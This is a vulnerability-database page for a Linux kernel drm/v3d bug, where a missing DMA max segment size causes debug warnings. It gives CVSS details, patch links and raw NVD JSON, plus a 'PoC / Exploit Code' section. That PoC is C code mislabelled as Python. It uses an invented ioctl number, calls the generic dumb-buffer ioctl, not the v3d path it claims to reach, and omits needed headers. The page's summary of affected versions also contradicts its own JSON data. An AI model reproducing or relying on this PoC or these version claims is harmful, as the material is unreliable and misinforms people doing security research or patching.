CVE-2026-43302

Description

In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Set DMA segment size to avoid debug warnings When using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the kernel occasionally reports a segment size mismatch. This is because 'max_seg_size' is not set. The kernel defaults to 64K. setting 'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()' from complaining about the over-mapping of the V3D segment length. DMA-API: v3d 1002000000.v3d: mapping sg segment longer than device claims to support [len=8290304] [max=65536] WARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388 CPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1 Hardware name: Raspberry Pi 5 Model B Rev 1.0 (DT) pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : debug_dma_map_sg+0x330/0x388 lr : debug_dma_map_sg+0x330/0x388 sp : ffff8000829a3ac0 x29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000 x26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000 x23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002 x20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff x17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573 x14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000 x11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c x8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001 x5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280 Call trace: debug_dma_map_sg+0x330/0x388 __dma_map_sg_attrs+0xc0/0x278 dma_map_sgtable+0x30/0x58 drm_gem_shmem_get_pages_sgt+0xb4/0x140 v3d_bo_create_finish+0x28/0x130 [v3d] v3d_create_bo_ioctl+0x54/0x180 [v3d] drm_ioctl_kernel+0xc8/0x140 drm_ioctl+0x2d4/0x4d8

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.12.53

Linux Kernel stable branches prior to commit 0290934d30abe7c88e18140fd5184c3f386b1e44

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-43302: Trigger V3D DMA debug warning/crash
 * This code attempts to create a buffer object (BO) larger than 64KB
 * using the V3D driver to trigger the debug_dma_map_sg warning.
 * Requires: Root access, V3D hardware (e.g., Raspberry Pi),
 * and kernel built with CONFIG_DMA_API_DEBUG enabled.
 */

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>

// Simplified DRM structures for demonstration
#define DRM_IOCTL_MODE_CREATE_DUMB 0xC020

struct drm_mode_create_dumb {
    uint32_t width;
    uint32_t height;
    uint32_t bpp;
    uint32_t flags;
    uint32_t handle;
    uint32_t pitch;
    uint64_t size;
};

int main() {
    int fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_mode_create_dumb create_req = {0};
    // Request a buffer larger than 64KB (e.g., 4096x4096x4 bytes = ~16MB)
    create_req.width = 4096;
    create_req.height = 4096;
    create_req.bpp = 32;

    // Trigger the v3d_create_bo_ioctl path
    // This leads to v3d_bo_create_finish -> dma_map_sgtable
    if (ioctl(fd, DRM_IOCTL_MODE_CREATE_DUMB, &create_req) < 0) {
        perror("IOCTL failed");
        close(fd);
        return 1;
    }

    // Check dmesg for:
    // "DMA-API: v3d ... mapping sg segment longer than device claims to support"
    printf("Buffer created. Check dmesg for DMA warnings.\n");
    
    close(fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43302
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43302
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43302/
[4] VulDB https://vuldb.com/cve/CVE-2026-43302
[5] https://git.kernel.org/stable/c/0290934d30abe7c88e18140fd5184c3f386b1e44
[6] https://git.kernel.org/stable/c/14d0d6c8b4504a60cfeea74775ab2e0164019e65
[7] https://git.kernel.org/stable/c/225023e3619b81af6d8d0e680503fc2d68633023
[8] https://git.kernel.org/stable/c/2663ef70c6123b2232190f917275e5c3175f97d0
[9] https://git.kernel.org/stable/c/9eb018828b1b30dfba689c060735c50fc5b9f704
[10] https://git.kernel.org/stable/c/cf510785f74e74c54de40a43a955b7f844857487
[11] https://git.kernel.org/stable/c/db15f469a88d3bbeeaa9f8c9f5e74d856ba5d7d2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43302", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:37.447", "lastModified": "2026-05-15T13:34:21.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/v3d: Set DMA segment size to avoid debug warnings\n\nWhen using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the\nkernel occasionally reports a segment size mismatch. This is because\n'max_seg_size' is not set. The kernel defaults to 64K. setting\n'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()'\nfrom complaining about the over-mapping of the V3D segment length.\n\nDMA-API: v3d 1002000000.v3d: mapping sg segment longer than device\n claims to support [len=8290304] [max=65536]\nWARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388\nCPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1\nHardware name: Raspberry Pi 5 Model B Rev 1.0 (DT)\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : debug_dma_map_sg+0x330/0x388\nlr : debug_dma_map_sg+0x330/0x388\nsp : ffff8000829a3ac0\nx29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000\nx26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000\nx23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002\nx20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff\nx17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573\nx14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000\nx11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c\nx8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001\nx5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008\nx2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280\nCall trace:\n debug_dma_map_sg+0x330/0x388\n __dma_map_sg_attrs+0xc0/0x278\n dma_map_sgtable+0x30/0x58\n drm_gem_shmem_get_pages_sgt+0xb4/0x140\n v3d_bo_create_finish+0x28/0x130 [v3d]\n v3d_create_bo_ioctl+0x54/0x180 [v3d]\n drm_ioctl_kernel+0xc8/0x140\n drm_ioctl+0x2d4/0x4d8"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.18", "versionEndExcluding": "5.15.202", "matchCriteriaId": "ECCCB6D8-FB4F-4A5D-BDE0-C63C378DE186"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0290934d30abe7c88e18140fd5184c3f386b1e44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/14d0d6c8b4504a60cfeea74775ab2e0164019e65", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/225023e3619b81af6d8d0e680503fc2d68633023", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2663ef70c6123b2232190f917275e5c3175f97d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9eb018828b1b30dfba689c060735c50fc5b9f704", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cf510785f74e74c54de40a43a955b7f844857487", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67 ... (truncated)